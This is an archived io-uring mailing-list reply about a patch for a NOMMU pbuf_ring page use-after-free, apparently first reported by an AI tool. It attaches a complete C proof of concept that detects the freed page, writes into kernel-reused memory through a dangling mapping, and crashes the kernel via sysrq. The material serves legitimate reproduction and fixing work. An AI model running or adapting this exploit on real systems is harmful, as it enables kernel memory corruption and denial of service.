public inbox for io-uring@vger.kernel.org
 help / color / mirror / Atom feed
From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200	[thread overview]
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh> (raw)
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>

[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]

On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> > 
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
> 
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days?  I should dig into that,
> maybe that way I can test this and get a reproducer for you.  If not,
> let's just bin the thing.
> 
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > > 
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead?  Or is this feature something that !MMU devices
> > > actually care about?
> > 
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> > 
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
> 
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...

Ok, attached is a poc.c and a script to run it.  If you run this on a
7.0 kernel today, it "should" crash. and then if you apply the patch it
doesn't (or at least that's what happened in my testing.)

Note, I have run this locally, and it seems to work, but be careful, I
can't guarantee anything, it does seem quite odd in that it "crashes"
the kernel with a sysrq call to show "proof".  Although that is a cool
trick, I need to remember that...

thanks,

greg k-h

[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]

// SPDX-License-Identifier: GPL-2.0
/*
 * PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
 * Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
 * cause but hits a mm/nommu.c BUG_ON that the fix does not address;
 * this PoC targets 02884.
 *
 * Fixed by commit b4190296e84b ("io_uring: take page references for
 * NOMMU pbuf_ring mmaps").
 *
 * Mechanism
 * ---------
 * Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
 * virtual address of the io_mapped_region's backing pages directly and
 * io_uring_mmap() takes no page references.  IORING_UNREGISTER_PBUF_RING
 *   -> io_put_bl()
 *   -> io_free_region()
 *   -> release_pages()
 * therefore drops the only reference and the page returns to the buddy
 * allocator while the user's VMA still has vm_start pointing into it.
 * The user can read/write whatever the allocator hands out next.
 *
 * Detection: write a canary to the mmap'd page, unregister, re-read.
 * Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
 * kernel the canary becomes 0x00.  On a fixed kernel io_uring_mmap()
 * holds a get_page reference, release_pages() leaves refcount >= 1,
 * the page is not freed, and the canary survives.
 *
 * On detection, demonstrate the write-after-free (re-allocate the page
 * inside the kernel and observe it via the dangling pointer), then
 * sysrq-crash so the qemu console shows an unambiguous kernel panic.
 *
 * Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
 *   make -C linux ARCH=riscv O=$PWD/build-nommu headers
 *   clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
 *         -mno-relax -static-pie -nostdlib -fno-stack-protector \
 *         -fno-builtin -isystem build-nommu/usr/include \
 *         -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
 *         -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
 *
 * -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
 * not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
 * (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
 *
 * Run as init under qemu-system-riscv64 -M virt -bios none.
 * Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
 * boot with init_on_free=1.
 */

/*
 * binfmt_elf_fdpic's initial stack layout is not the SysV layout that
 * nolibc's crt.h _start_c() expects; the auxv walk runs off into
 * garbage.  We don't need argc/argv/envp, so suppress crt.h and supply
 * a minimal _start_c that just calls main.  arch-riscv.h still provides
 * the asm _start that calls _start_c.
 */
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"

int main(void);
void _start_c(long *sp)
{
	(void)sp;
	exit(main());
}

#define __NR_io_uring_setup		425
#define __NR_io_uring_register		427

#define IORING_REGISTER_PBUF_RING	22
#define IORING_UNREGISTER_PBUF_RING	23
#define IORING_OFF_PBUF_RING		0x80000000ULL
#define IORING_OFF_PBUF_SHIFT		16
#define IOU_PBUF_RING_MMAP		1

#define PAGE_SIZE	4096
#define CANARY		0x55

struct io_sqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_cqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_uring_params {
	uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
	uint32_t features, wq_fd, resv[3];
	struct io_sqring_offsets sq_off;
	struct io_cqring_offsets cq_off;
};

struct io_uring_buf_reg {
	uint64_t ring_addr;
	uint32_t ring_entries;
	uint16_t bgid;
	uint16_t flags;
	uint64_t resv[3];
};

static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
	return my_syscall2(__NR_io_uring_setup, entries, p);
}

static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
	return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}

static void die(const char *what, long ret)
{
	printf("[-] %s: %ld\n", what, ret);
	if (getpid() == 1) {
		reboot(LINUX_REBOOT_CMD_POWER_OFF);
	}
	exit(1);
}

static void crash_kernel(void)
{
	int fd = open("/proc/sysrq-trigger", O_WRONLY);

	if (fd >= 0)
		write(fd, "c", 1);
	/* sysrq disabled or /proc missing — clean exit so qemu log is
	 * still parseable. */
	reboot(LINUX_REBOOT_CMD_POWER_OFF);
}

int main(void)
{
	struct io_uring_params p;
	struct io_uring_buf_reg reg;
	volatile unsigned char *ring;
	int fd, ret, i, dirty;

	if (getpid() == 1) {
		mkdir("/proc", 0555);
		mount("proc", "/proc", "proc", 0, NULL);
	}

	memset(&p, 0, sizeof(p));
	fd = io_uring_setup(8, &p);
	if (fd < 0)
		die("io_uring_setup", fd);

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 0;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("REGISTER_PBUF_RING", ret);

	ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
		    IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
	if (ring == MAP_FAILED)
		die("mmap PBUF_RING", (long)ring);

	printf("[*] pbuf_ring page mmap()ed at %p\n", ring);

	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = CANARY;

	memset(&reg, 0, sizeof(reg));
	reg.bgid = 0;
	ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("UNREGISTER_PBUF_RING", ret);

	printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
	       ring[0], ring[1], ring[2], ring[3]);

	dirty = 0;
	for (i = 0; i < PAGE_SIZE; i++)
		if (ring[i] != CANARY)
			dirty++;

	if (!dirty) {
		printf("[+] OK: canary intact — mmap holds page reference, "
		       "fix is applied\n");
		munmap((void *)ring, PAGE_SIZE);
		close(fd);
		if (getpid() == 1)
			reboot(LINUX_REBOOT_CMD_POWER_OFF);
		return 0;
	}

	printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
	       "(ring[0]=%02x, expected %02x) — page was freed under live mmap\n",
	       dirty, PAGE_SIZE, ring[0], CANARY);

	/*
	 * Demonstrate write-after-free: scribble through the dangling
	 * mapping, then make the kernel allocate a fresh page.  The pcp
	 * freelist is LIFO, so the just-freed page is handed straight
	 * back; we can observe the kernel's writes through our pointer.
	 */
	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = 0x41;

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 1;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);

	printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
	       "ring[0..3] now %02x %02x %02x %02x — kernel reused the page\n",
	       ret, ring[0], ring[1], ring[2], ring[3]);
	printf("[!] triggering sysrq crash\n");
	if (getpid() == 1)
		crash_kernel();
	return 1;
}

[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]

  parent reply	other threads:[~2026-04-21 16:01 UTC|newest]

Thread overview: 13+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55   ` Greg Kroah-Hartman
2026-04-21 14:02     ` Jens Axboe
2026-04-21 16:01     ` Greg Kroah-Hartman [this message]
2026-04-21 16:05       ` Jens Axboe
2026-04-21 16:21         ` Jens Axboe
2026-04-21 16:24           ` Greg Kroah-Hartman
2026-04-21 16:41             ` Jens Axboe
2026-04-21 17:04               ` Jens Axboe
2026-04-21 17:38                 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22  1:17   ` Jens Axboe

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=2026042140-arrogance-freehand-d8bd@gregkh \
    --to=gregkh@linuxfoundation.org \
    --cc=axboe@kernel.dk \
    --cc=io-uring@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox